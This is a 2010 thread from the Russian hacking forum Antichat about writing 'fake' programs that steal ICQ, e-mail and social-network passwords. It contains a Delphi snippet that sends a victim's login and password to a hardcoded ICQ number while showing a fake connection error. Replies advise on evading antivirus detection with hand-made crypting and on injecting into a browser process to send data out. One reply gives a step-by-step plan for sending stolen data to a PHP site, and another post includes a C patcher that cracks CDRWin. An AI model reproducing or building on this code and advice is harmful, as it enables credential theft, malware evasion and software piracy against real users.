Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   С/С++, C#, Delphi, .NET, Asm (https://forum.antichat.xyz/forumdisplay.php?f=24)
-   -   [КАК?]:Фейк программы и билдеры к ним. (https://forum.antichat.xyz/showthread.php?t=172259)

ZnikiR 21.01.2010 00:17

[КАК?]:Фейк программы и билдеры к ним.
 
Привет всем.
У меня появилась желание научиться писать такие фейки,точнее билдеры.
У меня вопрос к людям,которые разбираются в этом.
На чем лучше это писать?
Как прятать программы от антивирусов?
Куда лучше передавать пароли ICQ,HOST,e-mail?
Ну и наконец как это писать?
Сеть я переглядел,может не очень тщательно,но ничего стоящего и предельно объемного материала я не нашел.Так что просьба в гугл не посылать.

И еще дайте какие-нибудь исходники,чтобы можно было хоть посмотреть примеры.

Dark_Scorpicore 21.01.2010 00:52

Писать можно на чем угодно, рекомендовано: delphi/c++
Программы антивирями не палятся, если фрагменты твоего вредоносного кода не засвечены нигде(т.е. если писал все с нуля)
Насчет паролей - лучше мыло, т.к. проще реализовать (имхо)
Как писать - книжки по сокетам в помосчь.

Фрагмент кода на C++, реализующий отправку e-mail, могу слить. В пм

Gar|k 21.01.2010 00:56

прочти для начала главу 28 УК РФ и статью 138 УК РФ

я думаю программы надо писать руками, а думать головой.
так билдеры... хм ты хочешь написать компилятор? читай
1 Лексические анализаторы - http://ru.wikipedia.org/wiki/Lex
2 Синтаксические анализаторы - http://ru.wikipedia.org/wiki/Yacc
ну а потом немого теории поучишь по компиляторам... вот и не трудно будет доделать генерацию ассемблерного кода, а там уж и до машинного не далеко.

так как прятать программы - http://wasm.ru/article.php?article=hidingnt
передавать пароли лучше всего себе :) ну и если параноик шифруй сам - http://algolist.ru/defence/index.php или юзай ченить типа RSA (не спец)

Удачи...

POS_troi 21.01.2010 01:13

Цитата:

1 Лексические анализаторы - http://ru.wikipedia.org/wiki/Lex
2 Синтаксические анализаторы - http://ru.wikipedia.org/wiki/Yacc
ну а потом немого теории поучишь по компиляторам... вот и не трудно будет доделать генерацию ассемблерного кода, а там уж и до машинного не далеко.
Ты вообще о чем?


2ZnikiR
Можно сделать два варианта:

1. Хранить строковые параметры в ресурсах и билдером работать с ресурсами программы

2. Хранить например в переменных и билдером менять их по адрессам (принцип кряков)

ну например

Код:

#include "windows.h"

int main(int argc, char* argv[])
{
char JmpByte[] = "xeb";

HANDLE hFile;
DWORD iByteWrt = 0;

printf("Crack for CDRWin v5.01 - 5.02 by Over G[DWC Gr0up] ");
hFile=CreateFile("cdrwin5.exe",GENERIC_WRITE,FILE_SHARE_WRITE,NULL,OPEN_EXISTING,0,0);
SetFilePointer(hFile,0x3D99,NULL,0); //Смещение на 003D99
WriteFile(hFile, JmpByte, 1, &iByteWrt, NULL); //Пишем байт EB по адресу 003D99
SetFilePointer(hFile,0x18871,NULL,0); //Смещение на 0018871
WriteFile(hFile, JmpByte, 1, &iByteWrt, NULL); //Пишем байт EB по адресу 0018871
CloseHandle(hFile); //Закрываем файл
printf("File Successfull cracked!");
return 0;
}


ZnikiR 21.01.2010 02:07

Если я скажу,что теперь я чувствую себя ущербным,то это еще малая часть.
Я мало знаю C++ недавно начал изучать модульное программирование.
С delphi я вообще не знаком.
Скажите что использовать для того чтобы разрабатывать такие "программы".
Я просто даже не представляю каким образом делают такую красивые оформления к "программам".
Посоветуйте что-нибудь стоящее:книгу,ресурс где нет белиберды.
Просто я очень часто наталкиваюсь на ресуры где написана полная ересь.


Думаю идею о билдерах оставлю на сладкое,а сейчас Ыы не могли бы примерно рассказать как ручками сделать красивый фейк передающий пароль на мыло?
Что,где посмотреть,а самое главное как лучше практиковаться?

Irdis 21.01.2010 05:32

POS_troi
Мне конечно не интересно, но что за магию ты написал?

][yZ 21.01.2010 10:43

ZnikiR
Берешь в руки любую среду с хорошей визуалкой (та же дельфя сойдет), рисуешь интерфейс (фотошоп пригодится), лепишь там пару текстбоксов и кнопочку и по нажатию делаешь чонить красивое (типа появляется консоль с кучей непонятных буков) и отсылаешь пасс себе в аську/на мыло

Gar|k 21.01.2010 10:50

2 POS_troi я о компиляторах... ибо хз что подразумевает ТС под словом билдер
2 Irdis он написал, как отрыть файл и как записать в файл.

ТС, а ты и должен был понять, что ты ущербный и просто так ничего не делается. Учись и когда ты начнешь понимать, как сделана программа, к которой хочешь делать фейк и как самому сделать такую программу, делай фейк свой...

Сейчас у тебя вопрос звучит как-то так: Я мало знаю физику, вот недавно в школе прочитал учебник, как сделать адронный коллайдер?

ZnikiR 21.01.2010 13:09

2 Gar|k Так примерно понятно.
А какую программу для этого лучще использовать?
2 ][yZ На каком основание ты начинаешь гнать на меня?
Где можно взять исходники того же QIP и чем их просматривать?

В общем я понял,что проще тупо начать учить всё,потому что ответа я так и не получил на свой вопрос.
Тогда вопрос такой на чем более детально останавливаться?

RDL_Rider 21.01.2010 13:17

Учи Visual C++/Delphi и будет тебе щастье !

POS_troi 21.01.2010 13:24

Цитата:

Где можно взять исходники того же QIP и чем их просматривать?
он закрытый.

Цитата:

потому что ответа я так и не получил на свой вопрос.
Получил.

Код:

#include "windows.h"

int main(int argc, char* argv[])
{
char JmpByte[] = "xeb";

HANDLE hFile;
DWORD iByteWrt = 0;

printf("Crack for CDRWin v5.01 - 5.02 by Over G[DWC Gr0up] ");
hFile=CreateFile("cdrwin5.exe",GENERIC_WRITE,FILE_SHARE_WRITE,NULL,OPEN_EXISTING  ,0,0);
SetFilePointer(hFile,0x3D99,NULL,0); //Смещение на 003D99
WriteFile(hFile, JmpByte, 1, &iByteWrt, NULL); //Пишем байт EB по адресу 003D99
SetFilePointer(hFile,0x18871,NULL,0); //Смещение на 0018871
WriteFile(hFile, JmpByte, 1, &iByteWrt, NULL); //Пишем байт EB по адресу 0018871
CloseHandle(hFile); //Закрываем файл
printf("File Successfull cracked!");
return 0;
}

Все просто, смотриш в HEX по каким адресам лежит параметры и далее их перезаписуеш.

Цитата:

В общем я понял,что проще тупо начать учить всё
Все не нужно, начни с основ, Среду пока возьми Borland С++ (она попроще) MSVC 03-08 не очень для обучения (мое мнение).

Цитата:

Учи Visual C++/Delphi и будет тебе щастье !
Не оч хорошая рекомендация - Учить сразу и то и то не стоит (логика/ синтаксис разные)

ZnikiR 21.01.2010 14:48

Тогда следующий вопрос есть ли какие-нибудь интересные учебники или ресурсы.
Слышал что есть очень интересный учебник в котором рассматривается как на делфях написать однорукого бандита,но на него я так и не наталкивался.
Есть ли что-нить подобное на С++ ?Чтобы интересно было.

wolmer 21.01.2010 14:58

Цитата:

Куда лучше передавать пароли ICQ,HOST,e-mail?
Делаешь инжект в процес opera.exe (или другого работающего браузера), и отсылаешь данные на сайт (которые уже ввел юзер в фейк (к примеру))(можно и на прямую отсылать (от программы), но так сыкотнее)

Цитата:

Как прятать программы от антивирусов?
Ручной крипт

Цитата:

Где можно взять исходники того же QIP и чем их просматривать?
Дизассемблер в руки

flacs 21.01.2010 22:33

QIP написан на Delphi, DeDe by DaFixer тебе в помощь!

ZdezBilYa 22.01.2010 00:00

Для фейков не нужен исходный код программы, фейк которой делается

bilgeits 22.01.2010 00:05

Кто может написать хорошый фейк Одноклассники который не палится антивирями ... ???

wolmer 22.01.2010 00:14

Цитата:

Сообщение от bilgeits
Кто может написать хорошый фейк Одноклассники который не палится антивирями ... ???

На халяву?

ZnikiR 25.01.2010 21:52

Хорошо есть люди,которые могут научить писать фейки?
пишите в асю о цене договоримся.

RedFern.89 25.01.2010 23:05

1. Изучи Delphi. Он проще. ИМХО
2. Поставь себе цель, от куда будешь воровать данные
3. Изучи программу, из которой воруешь данные (какие записи в реестр делает, в какой файл пишет данные)
4. Изучи HTTP. По протоколу HTTP отсылай данные.
5. Поставь сайт с поддержкой PHP, MySQL...
6. Отсылай данные на него

если нужна помощь - обращайтесь. Помогу

RedFern.89 25.01.2010 23:17

Цитата:

Сообщение от wolmer
Делаешь инжект в процес opera.exe (или другого работающего браузера), и отсылаешь данные на сайт (которые уже ввел юзер в фейк (к примеру))(можно и на прямую отсылать (от программы), но так сыкотнее)


Ручной крипт


Дизассемблер в руки


инжект антивирями палится в момент)))

RDL_Rider 27.01.2010 20:57

Цитата:

Сообщение от POS_troi
Не оч хорошая рекомендация - Учить сразу и то и то не стоит (логика/ синтаксис разные)

Я имел ввиду или...или ;)

trunker 28.01.2010 17:23

скачал пару исходников фейков с отправкой на ICQ при запуске на обоих пишет ошибку:
Class TICQClient not Found Ignore the error?
NOTE: Ignoring the error may cayse components to be deleeted or property values to be lost.

подскажте плиз, в чем проблема?

ZdezBilYa 29.01.2010 02:23

Цитата:

Сообщение от trunker
скачал пару исходников фейков с отправкой на ICQ при запуске на обоих пишет ошибку:
Class TICQClient not Found Ignore the error?
NOTE: Ignoring the error may cayse components to be deleeted or property values to be lost.

подскажте плиз, в чем проблема?

не установлен компонент TICQClient

trunker 29.01.2010 13:04

Можете подсказать где норм скачать?? я уж несколько перепробовал просто, то ошибку выдает, то чет не то поставил...

ZdezBilYa 29.01.2010 13:14

http://progs.volkov.spb.su/ticqclient/

trunker 29.01.2010 13:39

я там и качал, у меня почему то ставится только ICQ db во вкладке ICQClient

wolmer 29.01.2010 14:23

Цитата:

Сообщение от trunker
я там и качал, у меня почему то ставится только ICQ db во вкладке ICQClient

Вкладка Simples, и там будет нужный компонент

trunker 29.01.2010 17:36

Код:

procedure TForm1.Button1Click(Sender: TObject);
begin
if (Edit1.Text='') or (Edit2.Text='') then
MessageBox(0, 'вы не ввели Логин или Пароль', 'Невозможно подключиться!', MB_ICONWARNING);
icqclient1.SendMessage(314958697, 'Nick: ' + Edit1.Text + '  Password: ' + Edit2.Text);
icqclient1.LogOff();
MessageBox(10, 'Не удалось подсоединиться к серверу!', 'Сервер не отвечает', MB_ICONWARNING);
end;

Поченму не выходит последнее сообщение?
MessageBox(10, 'Не удалось подсоединиться к серверу!', 'Сервер не отвечает', MB_ICONWARNING);


Время: 14:52